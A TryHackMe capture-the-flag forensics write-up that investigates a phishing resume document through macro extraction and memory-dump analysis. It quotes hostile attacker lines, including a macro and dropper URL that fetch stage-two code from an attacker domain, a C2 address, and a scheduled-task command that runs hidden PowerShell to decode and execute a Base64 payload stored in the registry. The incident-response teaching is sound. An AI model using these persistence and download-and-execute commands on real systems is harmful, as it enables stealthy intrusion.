Table of Contents
Boogeyman 2 #
🏴 Platform: TryHackMe
🔬 Category: Forensics / DFIR
🟠 Difficulty: Medium
📅 Date: 2026-02-12
✍️ Author: tonton
⏱️ Reading time: ~4 min
Reconnaissance #
Quick Logistics LLC employee Maxine Beck (HR Specialist) received a phishing email with a malicious Word document disguised as a job application resume. The security team flagged suspicious commands on her workstation.
Artefacts provided:
- Phishing email (
.eml) - Memory dump of the victim's workstation (
.raw)
Tools available on the VM:
- Volatility 3 — memory forensics
- olevba — VBA macro extraction
Exploitation #
Phase 1 — Phishing email analysis #
Reading the .eml headers reveals the sender, victim, and attachment:
From: westaylor23@outlook.com
To: maxine.beck@quicklogisticsorg.onmicrosoft.com
Subject: Resume - Application for Junior IT Analyst Role
Attachment: Resume_WesleyTaylor.doc
Extracting the attachment and computing the MD5:
1import email, hashlib
2
3with open('itrole.eml', 'r') as f:
4 msg = email.message_from_file(f)
5
6for part in msg.walk():
7 fn = part.get_filename()
8 if fn:
9 data = part.get_payload(decode=True)
10 print(hashlib.md5(data).hexdigest())
MD5: 52c4384a0b9e248b95804352ebec6c5b
Phase 2 — Malicious macro analysis #
1olevba Resume_WesleyTaylor.doc
The VBA macro (AutoOpen) does the following:
- Downloads
update.pngfromhttps://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png - Saves it as
C:\ProgramData\update.js - Executes it via
wscript.exe C:\ProgramData\update.js
Phase 3 — Memory dump analysis: process tree #
1vol -f memorydump.raw windows.pstree
The full attack chain in the process tree:
explorer.exe (596)
└── OUTLOOK.EXE (1440)
└── WINWORD.EXE (1124) ← opens malicious .doc
└── wscript.exe (4260) ← macro executes update.js
└── updater.exe (6216) ← C2 binary
└── conhost.exe (4464)
Confirming the command line:
1vol -f memorydump.raw windows.cmdline --pid 4260
2# wscript.exe C:\ProgramData\update.js
3
4vol -f memorydump.raw windows.cmdline --pid 6216
5# "C:\Windows\Tasks\updater.exe"
Phase 4 — Stage 2 payload URL #
Searching for the download URL inside update.js from the memory dump:
1strings memorydump.raw | grep -i "boogeymanisback.lol/" | grep -v "\*\."
Reveals update.js contains:
1var url = "https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.exe"
Phase 5 — C2 connection #
1vol -f memorydump.raw windows.netscan | grep -i updater
Multiple TCP connections from updater.exe (PID 6216) to 128.199.95.189:8080.
Phase 6 — Persistence mechanism #
1strings memorydump.raw | grep -i "schtasks /create"
The attacker created a daily scheduled task:
schtasks /Create /F /SC DAILY /ST 09:00 /TN Updater /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))"'
This runs a hidden PowerShell every day at 09:00 that reads a Base64-encoded payload from the registry key HKCU:\Software\Microsoft\Windows\CurrentVersion\debug.
Phase 7 — Email attachment path in memory #
1vol -f memorydump.raw windows.filescan | grep -i "Resume_WesleyTaylor"
Full path: C:\Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc
Answers #
| # | Question | Answer |
|---|---|---|
| 1 | Sender email | REDACTED |
| 2 | Victim email | REDACTED |
| 3 | Malicious document name | REDACTED |
| 4 | MD5 hash | REDACTED |
| 5 | Stage 2 download URL (macro) | REDACTED |
| 6 | Process executing stage 2 | REDACTED |
| 7 | Stage 2 full file path | REDACTED |
| 8 | Stage 2 PID | REDACTED |
| 9 | Stage 2 PPID | REDACTED |
| 10 | C2 binary download URL | REDACTED |
| 11 | C2 process PID | REDACTED |
| 12 | C2 binary full path | REDACTED |
| 13 | C2 IP:port | REDACTED |
| 14 | Attachment path (memory) | REDACTED |
| 15 | Persistence command | REDACTED |
Tools Used #
- Volatility 3 —
windows.pstree,windows.cmdline,windows.netscan,windows.filescan,windows.dumpfiles - olevba — VBA macro extraction from
.doc - strings + grep — raw memory string searching for URLs and schtasks commands
- Python 3 — email parsing and MD5 hashing
What Didn't Work #
vol windows.cmdline | grep schtasksreturned nothing — the schtasks command was not in a running process's cmdline, had to fall back tostringson the raw dump- Same for finding the
update.exedownload URL — not visible via Volatility plugins, required raw string search
Lessons Learned #
- Volatility plugins don't catch everything — when structured plugins fail,
strings+grepon the raw dump is a powerful fallback - Follow the process tree — the parent-child chain (
OUTLOOK → WINWORD → wscript → updater) tells the entire story of the attack - Registry-based persistence is stealthy — the payload is stored as a Base64 blob in
HKCU:\Software\Microsoft\Windows\CurrentVersion\debug, with a scheduled task triggering a hidden PowerShell to decode and execute it daily - Kill chain mapping: phishing email → macro execution → JS dropper → C2 binary → persistence via schtasks + registry